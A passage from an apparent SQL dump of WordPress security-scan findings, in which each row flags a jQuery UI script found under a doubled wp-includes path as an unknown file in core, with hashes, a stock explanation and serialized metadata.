tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/checkboxradio.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77679,1675048844,1675048844,'new','knownfile',75,'6aa5fd4b7509ac81b0ecf9a99af78736','a87c4384383a83e47d0a578518eb3893','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77680,1675048844,1675048844,'new','knownfile',75,'e34ef1bbfd09d36dcb9ec99fef2f9c65','035c016f37c2ff47263e517a433fc80f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/controlgroup.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/controlgroup.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77681,1675048844,1675048844,'new','knownfile',75,'07943477864869f93d2acdf93f132e99','20c71a970edd0923f0efa5d82d6e4a11','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77682,1675048844,1675048844,'new','knownfile',75,'0163a00cd1c9521237898cb2f8069e36','94d5179b54f91b49edeb32521978da43','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/core.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/core.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77683,1675048844,1675048844,'new','knownfile',75,'1ef73377ea1b807bf4091949c54f8d84','907472e61c099cc9960d57768287926b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/core.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/core.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77684,1675048844,1675048844,'new','knownfile',75,'c725989ae29016de28cdfe6fa6e781b7','d3f27f8d05d1b58c355e96d3e61e9e4d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/datepicker.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/datepicker.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77685,1675048844,1675048844,'new','knownfile',75,'d04847ca26db9d5025033372808dda32','e1aa793f2c2ed4451e5d4a036a53f903','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/datepicker.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/datepicker.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77686,1675048844,1675048844,'new','knownfile',75,'e28d214708ef162840e403b1cf2ac55f','03dd768c7082fafd04758961526b5438','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/dialog.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/dialog.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77687,1675048845,1675048845,'new','knownfile',75,'73739fd4fa8a87ab77bc54cb66fdabf2','bcb98aed8f862b27e52225cecb1e7bc7','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/dialog.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/dialog.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77688,1675048845,1675048845,'new','knownfile',75,'2f47f1ea252598ad0972e5fe4fa0b6bb','ad312bd69135a66f25d009cb2982aea4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/draggable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/draggable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77689,1675048845,1675048845,'new','knownfile',75,'08807b82d2d70492d2853add9ab72095','e2774b15951bf4009ceea44a9d491af1','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/draggable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/draggable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77690,1675048845,1675048845,'new','knownfile',75,'471534b067fbd1989891280f48debb48','5661e63c607ce63486b83ed5413a5193','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/droppable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/droppable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77691,1675048845,1675048845,'new','knownfile',75,'5e6abbb91dc68290645d4919cfcd405b','d76f0131b4bf89c292db210ee5c47e87','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/droppable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/droppable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77692,1675048845,1675048845,'new','knownfile',75,'be299856cb84df8cf2d4b4b6b26efca3','e57ef583db84b17bd1c5267d0dfb253f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-blind.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-blind.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77693,1675048845,1675048845,'new','knownfile',75,'6428d8809c0b38e135bd54cd4c474f7f','d0686bf29019c0ed99eaccc185de88df','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77694,1675048845,1675048845,'new','knownfile',75,'720d337c9492eb0255fefddc84f8df1c','c32fdfeaeee07b65212b5660e30ead77','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-bounce.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/effect-bounce.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77695,1675048845,1675048845,'new','knownfile',75,'b5a1a75b9d234a82ab974be7e21ee974','a0174b22d4cf82b74ff4ccd606909a11','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77696,1675048845,1675048845,'new','knownfile',75,'617928190a61cf7c1f30ba0bb0824cb2','43ff2f8954aefda7dc245883297bfa07','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-clip.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-clip.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77697,1675048845,1675048845,'new','knownfile',75,'da56661cc628329f68b9fd1f22c6685e','7ea1bf1f05dac090e9a410c5649db402','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77698,1675048845,1675048845,'new','knownfile',75,'70540802e4790e7b361d0a3dad1fd1b5','f14849db960adfe861f8eff004ecf5ea','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-drop.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-drop.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77699,1675048845,1675048845,'new','knownfile',75,'62124a5242c600dc02789528601ce3ed','8060612cc97f3cca61ab7bc3d31d7dd5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77700,1675048845,1675048845,'new','knownfile',75,'4176eca2d7996f62da4b6b52420924f4','8fede1b43b677e48276cb5f17b7e6790','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-explode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/effect-explode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77701,1675048845,1675048845,'new','knownfile',75,'e592e5afe1a1fbd57b4f13845d72f4c4','463a57ac13dd3a85f71f34c06f1b1387','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77702,1675048845,1675048845,'new','knownfile',75,'a595bc9070e15cb849bce96763581552','7848bc5fce3a1d5d0d096add814adccc','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fade.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-fade.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77703,1675048845,1675048845,'new','knownfile',75,'2b577027723cf6d53114dcc70853eae1','27948325674b7a28dffce5026e05b188','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77704,1675048845,1675048845,'new','knownfile',75,'699bd5668e60b6dc8b202007288ee440','751d03d63c707f1be366aeb7e21d2a39','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fold.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-fold.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77705,1675048846,1675048846,'new','knownfile',75,'b75d2e0689be54ef3eec39087c3b5d12','936eb42a4233b026b367c4b166eeeb25','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77706,1675048846,1675048846,'new','knownfile',75,'dc5d63cf5c538e6fb1d66fccd9aa4b80','11be3c2190882a88ddac3fa0d1cacd58','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-highlight.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-highlight.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77707,1675048846,1675048846,'new','knownfile',75,'0a448c26b216f8a71efdec7ba2c32a94','eac4452916aa5091f4b05a729f816603','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77708,1675048846,1675048846,'new','knownfile',75,'3beaec3b5a2f0b45e7eb4ca4a4e2c474','1d794bbe410515ab48be8f5cffadd87d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-puff.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-puff.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77709,1675048846,1675048846,'new','knownfile',75,'fd7e7499e938b752b4d9f56e01b658f0','ba2fcd013acda27d54e7cb2b214e38a8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77710,1675048846,1675048846,'new','knownfile',75,'1d749fe4f9c5a5ed3d6efa122d932ab7','d10968b47511b5a78fc1da7cabf92647','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77711,1675048846,1675048846,'new','knownfile',75,'63dea87486beadb090f871e135a9fb40','239df9ba8c5081f3d0501194411b88f1','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77712,1675048846,1675048846,'new','knownfile',75,'823829a0506ce7c96a6159369a14434f','e2791bc4232932c55805ef75b7f8cae0','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-scale.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-scale.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77713,1675048846,1675048846,'new','knownfile',75,'001edd2bf592ce6fc07b016eb0d6f49f','f969ca9c9a3a782c50845b29322aae7e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77714,1675048846,1675048846,'new','knownfile',75,'2b43040b5f09d480fb6cf2aaf3ce8a77','cd69d89d783c2cee9fcfabdbb1a02fa3','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-shake.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-shake.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77715,1675048846,1675048846,'new','knownfile',75,'761ab3e9dccc32851c30b541988e10db','f8b853b89d49d2cc2c95e982f69e103f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 